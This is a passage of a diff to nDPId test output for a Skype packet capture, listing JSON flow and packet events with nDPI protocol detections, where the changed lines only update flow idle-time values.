+00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":685,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1431969663377,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969663377,"pkt":"0NQSxnP1PBXCt3IOCABFAABA1DJAAEAGhNzAqAEinTeCp8N8nF+W1hb6AAAAALAC\/\/8sigAAAgQFtAEDAwUBAQgKPiLc+gAAAAAEAgAA"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":686,"source":"skype.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"skype.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1431969663378,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969663378,"pkt":"0NQSxnP1PBXCt3IOCABFAAAy1ywAAEARC+fAqAEinTc4pjLdnFYAHmpym\/YCUIZT7d8ZZahDgzlHGwrFeQgMHw=="} 
00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":686,"source":"skype.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -327,8 +327,8 @@ 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":690,"source":"skype.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.157","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":690,"source":"skype.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1431969663378,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431969663378,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5cNoAAEARvzrAqAEinTfrnTLdnEoAJXKym\/4Cz\/csSQ42SRwcVm84KNSC1Bge6u0+CtZPiaQ="} 00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":690,"source":"skype.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.157","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1431969663505,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969663505,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhOdN4KnwKgBIpxfw3yB0ZuyltYW+6ASOJDi6AAAAgQFrAQCCApOq7XZPiLc+gEDAwk="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":3,"flow_last_seen":1431969663505,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969663505,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0s6BAAEAGpXrAqAEinTeCp8N8nF+W1hb7gdGbs4AQECw5lAAAAQEICj4i3XlOq7XZ"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1431969663505,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969663505,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhOdN4KnwKgBIpxfw3yB0ZuyltYW+6ASOJDi6AAAAgQFrAQCCApOq7XZPiLc+gEDAwk="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":3,"flow_last_seen":1431969663505,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969663505,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0s6BAAEAGpXrAqAEinTeCp8N8nF+W1hb7gdGbs4AQECw5lAAAAQEICj4i3XlOq7XZ"} 
00536{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":702,"source":"skype.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664357,"flow_last_seen":1431969664357,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969664357,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"skype.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1431969664357,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1431969664357,"pkt":"AQBeAAABoPPBbTu2CABGrAAgAAAAAAECgoTAqAD+4AAAAZQEAAARZO6bAAAAAA=="} 00595{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":702,"source":"skype.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664357,"flow_last_seen":1431969664357,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969664357,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
@@ -347,15 +347,15 @@ 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":707,"source":"skype.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.141","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":707,"source":"skype.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1431969664405,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969664405,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1GOEAAEAR4qLAqAEib91NjTLdnFQAIf21nAgChdWCG2VT3PvRM4JN\/HMVRe1geqFvmA=="} 00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"skype.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.141","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664990,"flow_last_seen":1431969664990,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969664990,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50045,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1431969664990,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969664990,"pkt":"0NQSxnP1PBXCt3IOCABFAABAI3tAAEAGNZTAqAEinTeCp8N9Abt3wuHVAAAAALAC\/\/8VHgAAAgQFtAEDAwUBAQgKPiLjQgAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664990,"flow_last_seen":1431969664990,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969664990,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50045,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1431969664990,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969664990,"pkt":"0NQSxnP1PBXCt3IOCABFAABAI3tAAEAGNZTAqAEinTeCp8N9Abt3wuHVAAAAALAC\/\/8VHgAAAgQFtAEDAwUBAQgKPiLjQgAAAAAEAgAA"} 00538{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":712,"source":"skype.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665006,"flow_last_seen":1431969665006,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969665006,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":712,"source":"skype.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1431969665006,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":8,"thread_ts_msec":1431969665006,"pkt":"PBXCt3IOxCwDBkn+CABGAAAgivAAAAEC9ufAqAFc4AAA+5QEAAAWAAkE4AAA+wAAAAAAAAAAAAAAAAAA"} 
00597{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":712,"source":"skype.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665006,"flow_last_seen":1431969665006,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969665006,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":713,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1431969665118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969665118,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhOdN4KnwKgBIgG7w31xB6fgd8Lh1qASOJDOhQAAAgQFrAQCCApOq7dsPiLjQgEDAwk="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":714,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":3,"flow_last_seen":1431969665118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969665118,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0H2lAAEAGObLAqAEinTeCp8N9Abt3wuHWcQen4YAQECwlMAAAAQEICj4i48JOq7ds"} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":719,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50046,"dst_port":40011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":719,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1431969665416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969665416,"pkt":"0NQSxnP1PBXCt3IOCABFAABA9S9AAEAGY\/DAqAEinTeClsN+nEtADbnoAAAAALAC\/\/\/YlwAAAgQFtAEDAwUBAQgKPiLk6gAAAAAEAgAA"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":713,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1431969665118,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969665118,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhOdN4KnwKgBIgG7w31xB6fgd8Lh1qASOJDOhQAAAgQFrAQCCApOq7dsPiLjQgEDAwk="} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":714,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":3,"flow_last_seen":1431969665118,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969665118,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0H2lAAEAGObLAqAEinTeCp8N9Abt3wuHWcQen4YAQECwlMAAAAQEICj4i48JOq7ds"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":719,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50046,"dst_port":40011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":719,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1431969665416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969665416,"pkt":"0NQSxnP1PBXCt3IOCABFAABA9S9AAEAGY\/DAqAEinTeClsN+nEtADbnoAAAAALAC\/\/\/YlwAAAgQFtAEDAwUBAQgKPiLk6gAAAAAEAgAA"} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":720,"source":"skype.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":720,"source":"skype.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1431969665416,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969665416,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1j8QAAEARCNrAqAEiQTffGDLdnGAAISuNnAoCfsB5JB\/rTYpH1Pyy3TEn61xOyU3n6Q=="} 00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":720,"source":"skype.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -371,8 +371,8 @@ 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":724,"source":"skype.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":724,"source":"skype.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1431969665416,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431969665416,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+hGcAAEARenXAqAEib91KKzLdnEEAKumHnBICbsOSISjTImKbV\/UiCWod5a6w5EFlZL740jo5mcYkgQ=="} 00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":724,"source":"skype.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1431969665632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969665632,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiSdN4KWwKgBIpxLw35DcUQuQA256aASOJA7FQAAAgQFrAQCCApOt5+TPiLk6gEDAwk="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":727,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":3,"flow_last_seen":1431969665632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969665632,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0tVZAAEAGo9XAqAEinTeClsN+nEtADbnpQ3FEL4AQECyRaAAAAQEICj4i5cFOt5+T"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1431969665632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969665632,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiSdN4KWwKgBIpxLw35DcUQuQA256aASOJA7FQAAAgQFrAQCCApOt5+TPiLk6gEDAwk="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":727,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":3,"flow_last_seen":1431969665632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969665632,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0tVZAAEAGo9XAqAEinTeClsN+nEtADbnpQ3FEL4AQECyRaAAAAQEICj4i5cFOt5+T"} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":736,"source":"skype.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":736,"source":"skype.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1431969666429,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969666429,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0QwsAAEARVYDAqAEiQTffLDLdnE0AIF\/DnBQCMyjz3r9eJ18XTFVNiAvxrYpQ3ucg"} 00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":736,"source":"skype.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -388,12 +388,12 @@ 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"skype.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.47","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"skype.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1431969666429,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969666429,"pkt":"0NQSxnP1PBXCt3IOCABFAAAy3VkAAEARCjDAqAEinTg0LzLdnF0AHgzhnBwC9HB1yp1CFIBUD5AqeEDWvWy7jA=="} 00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":740,"source":"skype.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.47","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": 